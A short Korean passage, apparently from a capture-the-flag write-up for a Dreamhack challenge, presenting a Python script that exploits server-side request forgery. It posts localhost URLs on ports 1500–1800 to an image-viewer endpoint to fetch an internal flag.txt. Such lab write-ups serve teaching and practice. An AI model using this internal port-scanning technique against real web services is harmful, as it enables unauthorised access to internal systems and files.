그래서 짠 코드는 아래와 같다.
import requests
url = "http://host3.dreamhack.games:21428/img_viewer"
for i in range(1500, 1801):
img = f"http://Localhost:{i}/flag.txt"
data = {"url":img}
res = requests.post(url, data=data)
if "iVBORw0KG" not in res.text:
print(res.text)